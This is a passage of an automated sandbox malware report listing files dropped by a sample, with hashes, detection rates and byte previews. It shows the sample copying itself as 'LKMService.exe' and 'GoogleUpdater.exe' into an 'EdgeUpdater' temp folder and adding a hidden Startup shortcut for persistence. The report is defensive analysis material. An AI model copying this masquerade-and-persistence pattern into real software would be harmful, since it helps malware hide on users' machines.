Preview:	MDMP..a..... ..........f....................................$...........T!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T.......d......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER547B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8396
Entropy (8bit):	3.6917814099613753
Encrypted:	false
SSDEEP:	192:R6l7wVeJJK6zte6Y2D1SU91YgmfZbhnYpr189bfksfq6Vm:R6lXJU6g6YISU91Ygmf1JfXfS
MD5:	B0980434FFBDAA762C95665F066DD843
SHA1:	A27F328F6182E91DA52D854F3C9052D1CFAE1C17
SHA-256:	BB6318A9ABD2FF02F12C48796ED88AFC17111F29AA9122FEC6245F26E0177D83
SHA-512:	2B2FC202D202630EC16D3B848DCDA394A146492A77DD4AB7B9D60D4424B53030304452B185115A67CF1EA11AA6235ED338181E80114CAD7CF354BE215BEDDA4A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER549B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4751
Entropy (8bit):	4.466342739508
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9EHWpW8VYBPYm8M4JcgHEO7Fvu+q8vCHEOmvBb7EA77d:uIjfJI7C27V8SJcgkYuKCk9V7T77d
MD5:	65D10AB8B007478771713CB7E4DD09FD
SHA1:	6A5BE053C4B460914B6EB77F9115320513B6B2F9
SHA-256:	CC7E17F35542B5B69FE0F29F8691DAD242021AAEACB463377D51B2E2AEA96FBB
SHA-512:	746708497B69A8A704BD4CD71DB67FCC73D7F6F9EEC599AEE6A38DA064BCB9771B342CAF53EFF4C9587D994D366B80EB42E8E51DDD9F17545CABE45F585E4757
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7272.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:32 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	194788
Entropy (8bit):	4.099616745804321
Encrypted:	false
SSDEEP:	3072:wc/Z3SaHmq64g10gCIj4uEqZkplLTg0yzz:wc/Z3XH/Q1EIj43HTg0yz
MD5:	A87D164EB4D7C0A06D93F09DA3B95093
SHA1:	C050286F1A15E2D83F6F53A87DF9431E14132DD0
SHA-256:	9AFFA88AD036DF05ECD73AAE7F8FE796023BF3176FCA6E7B65D4D60054632FE9
SHA-512:	A88DCD806A44D8EC907B60E4C3CFD285D61E98C8CBECC72633D932A7BC409078DE830E95D568EA5834941FF950A7A580A38C7C6C582A286DAD0C28F0392A3D7B
Malicious:	false
Preview:	MDMP..a..... ..........f....................................$...........d!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T.......t......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73AB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.690156883829524
Encrypted:	false
SSDEEP:	192:R6l7wVeJXs6E6Y2DZSUR8gmfZkhnYprM89bYesftom:R6lXJ86E6YESUR8gmfmSYdfH
MD5:	0E8D6A706CC3473569A47CC5343BB249
SHA1:	229E57A24CC93AF0305CEFA74A24AC64D26A385F
SHA-256:	F75F4CB627DFFCCCA6F215C523642A73CF9638A768AFB3C8BDC9DA14B99D6DA2
SHA-512:	BB43E9BF04E684D7214F34FCEC96074006528D5A6025A6243D25D0B8EBFFE7324FE9E0B727594C55E584C8AEED8AE73A22EBA137E0FF92285165DDD17AD7480C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.8.4.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7523.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4766
Entropy (8bit):	4.46373827857693
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9EHWpW8VY2B0Ym8M4JzEO7F8+q8v1EOPBSEL6d:uIjfJI7C27VdnJo3KOCUq6d
MD5:	52B89849DFF39D21618C49C0D1D1178C
SHA1:	F0649C6FA787F8EE106234E737B46DC6516D4A06
SHA-256:	9CE64DA2B4007FF7F8BCEA6DD11B49A2AC39B65F85D85906EC46D40EB23310AA
SHA-512:	C5CCBFFE39BF2560B32CCE5A6DD15BEB77C0737A5E3EB49805BA1E360859708605472250102F9B84BB87952CD102468BAEA05B73E625E69023251ACB5D6A81FC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER951D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	193644
Entropy (8bit):	4.105630127271952
Encrypted:	false
SSDEEP:	1536:7B+R5gfWweqCDN1ctTPSbM/CJ1k6peUG9BAuBojRppN4uE2aOmnyLTgdSVXDXpAw:lAFDhNYDlUG92V4uEqmnyLTgdyzjl
MD5:	4FAF2A6D474D8752BF7A755E54E597D4
SHA1:	66E70128D1212C830DB6CF601918F45B8AA6D52B
SHA-256:	9710EB96246D73811ED497D939A154EB653AD73A80AFD308AD6BA74188BD695A
SHA-512:	FA3B00B57C4B1A2A2536D7035A22BFACCB175084AA8DDAEE9E4B4277EAC2F9D56542E8411B5354EF72E25EE86DF189CFD69C1E7041627293354112FC89D982CD
Malicious:	false
Preview:	MDMP..a..... ..........f....................................$...........4!...:..........`.......8...........T............$..\|.......................................................................................................eJ......8.......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER95F8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.6912520085247182
Encrypted:	false
SSDEEP:	192:R6l7wVeJLS6Ec6Y2DUSUcgmfZbhnYprA89bdqsfAHfm:R6lXJe6f6YJSUcgmf1WdJfA+
MD5:	BA547BC5A618B84088B21CA964AD1213
SHA1:	949DF31C32213A2D7CD079B6477DCECA409CFB24
SHA-256:	1BA34930AED8EC99EB3927B1808A4D5AB7F09D21597859B84D27754F2DAD8652
SHA-512:	AA728D645EAF2520CEC9D9FF839932B78235ADD74E29456D85E9C13706FAECA45D61357146E1858C549A528D07650D3FFC8AE900BD4CF4E245DB7D9262764273
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9628.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4751
Entropy (8bit):	4.465408303643834
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9EHWpW8VYaYm8M4JcgHEO7F3x+q8vCHEOQBb7EA7Vd:uIjfJI7C27VmJcgkqxKCkxV7T7Vd
MD5:	D1C1E15351A7CBF6CFD831AA6FE04C73
SHA1:	D1690E5DC87340450713DF5591F4962E4F974B11
SHA-256:	1EDBAD949ACA2BC42F343572587337C28B040A0C12A16464028916835332DCC2
SHA-512:	4BC915E61C8F821CCB46BA0E6B30168B8994A9A23E7A9463993916EE8B634A4C5279BBF8BD27392FAF300FD34888A308FA16AC1DFEEAC1698D8B9F9915185476
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3EF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	194480
Entropy (8bit):	4.096240485911788
Encrypted:	false
SSDEEP:	3072:tFrUquuEjgWkCEy4uEqRMKLTgy9yGMVE:tFrUqusWdEy4EMoTgy9yGM
MD5:	547D9FD69CB4BD9A7E14105A24F330E8
SHA1:	CF6E6C481C1AC6D9E8C6BDB565A07F34A72AA362
SHA-256:	215C41EC941CA74FC600F65CB8D2F926491DE916BCF520F6D56CAE70FFB33923
SHA-512:	01F720D89EA73E987EF58EA1EF8C1CCCF94EDE4ED87BE060C53667A1D6071B79E0A542CB26D064AE9BB8374A8C48B2EB15152896B4379814055E584A6CD5B0C0
Malicious:	false
Preview:	MDMP..a..... ..........f....................................$...........T!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4AC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.690275104557864
Encrypted:	false
SSDEEP:	192:R6l7wVeJ3m6Xve6Y2DwSUpgmfZkhnYprY89bV0sfgvHm:R6lXJ26G6YNSUpgmfmOVnfF
MD5:	0504D67A4A77DBE771BF43735C330C36
SHA1:	6F3E4BA084EA2220E1128CA4343A6C7190BE866E
SHA-256:	E335E98AE19B8A234F22612545F4B3D52BA5208BF7C987959A8180D19E720728
SHA-512:	23B0BFB317D4A0025B7D8ED3ED654E001F9702CC5D3ACE8C62FD6779322BBCC0DA9D862B8B0D30B5C1FE91093CC0FE4581CB6C15E3D1838F5976A003262D743B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4DC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4766
Entropy (8bit):	4.463643359792613
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9EHWpW8VYqYm8M4JzEO7Fz/J+q8v1EOKBSELmd:uIjfJI7C27VSJoK/JKOLUqmd
MD5:	7B68695974828638EC284EEFDBEDBDE8
SHA1:	592A96D90C125523A5E1A84584F028054C746F32
SHA-256:	A500580683FC9D6090C3586B3B6C856ACBAD1F940C9BECA5B36508142484BCDC
SHA-512:	2BFAD840E1C1860897B23BE9AADAC0780EA9A530468B79DED12F8F4AB7AFD1A674B34D2E40E2FA287521E12654A479B2CA01D9AD42E6A6426791137B90E0ABFC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	243888
Entropy (8bit):	7.063657397171467
Encrypted:	false
SSDEEP:	3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
MD5:	F37E0267C53AE8E94FE38E87524B8C45
SHA1:	FACAA93A619AB87DA8AC448DD1FC71FB72E5380E
SHA-256:	3ECF0A5FDC66D37C9E726334A0E57D6DC1E3AB622653D032F8DB827185CC7C80
SHA-512:	9684C9D8B8C6995F889BE8E8A72E8340D12B32E85327C5B70892191F4510B32F374FC408AED1E37022326AF43F620D187ABFBC93F8F218488C65C3DD732DDB74
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 24%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`.................................D...(....................\...\... ..........8...........................................................0...H............text....T... ...................... ..`.wyi................................@...."Rv.....L.......N.................. ..`.rsrc................T..............@..@.reloc....... .......Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe:Zone.Identifier

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	243888
Entropy (8bit):	7.063657397171467
Encrypted:	false
SSDEEP:	3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
MD5:	F37E0267C53AE8E94FE38E87524B8C45
SHA1:	FACAA93A619AB87DA8AC448DD1FC71FB72E5380E
SHA-256:	3ECF0A5FDC66D37C9E726334A0E57D6DC1E3AB622653D032F8DB827185CC7C80
SHA-512:	9684C9D8B8C6995F889BE8E8A72E8340D12B32E85327C5B70892191F4510B32F374FC408AED1E37022326AF43F620D187ABFBC93F8F218488C65C3DD732DDB74
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 24%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`.................................D...(....................\...\... ..........8...........................................................0...H............text....T... ...................... ..`.wyi................................@...."Rv.....L.......N.................. ..`.rsrc................T..............@..@.reloc....... .......Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0f1fdcd72fa2443cb400c03502902fe9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:33 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939386316228691
Encrypted:	false
SSDEEP:	24:82ARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8XJD3lfAvRAt41vgHyg
MD5:	890B5849DE940BF2A5B949693D4717F9
SHA1:	7C147AFC83E9C257E8308EC8F275794948CDA39C
SHA-256:	71EB298D08DB8A229F613B7F842F6D5879AF8A99C7C40765E179AFFE949DEC44
SHA-512:	190A15FDF8E46F14C45E5A6C8E2188343775E27A9A4349D324243985D03AFC8EE726A7B20B4C0EEBD977AD5A772EFC872B3BE032C5FF96E8350419ACA7AB296E
Malicious:	false
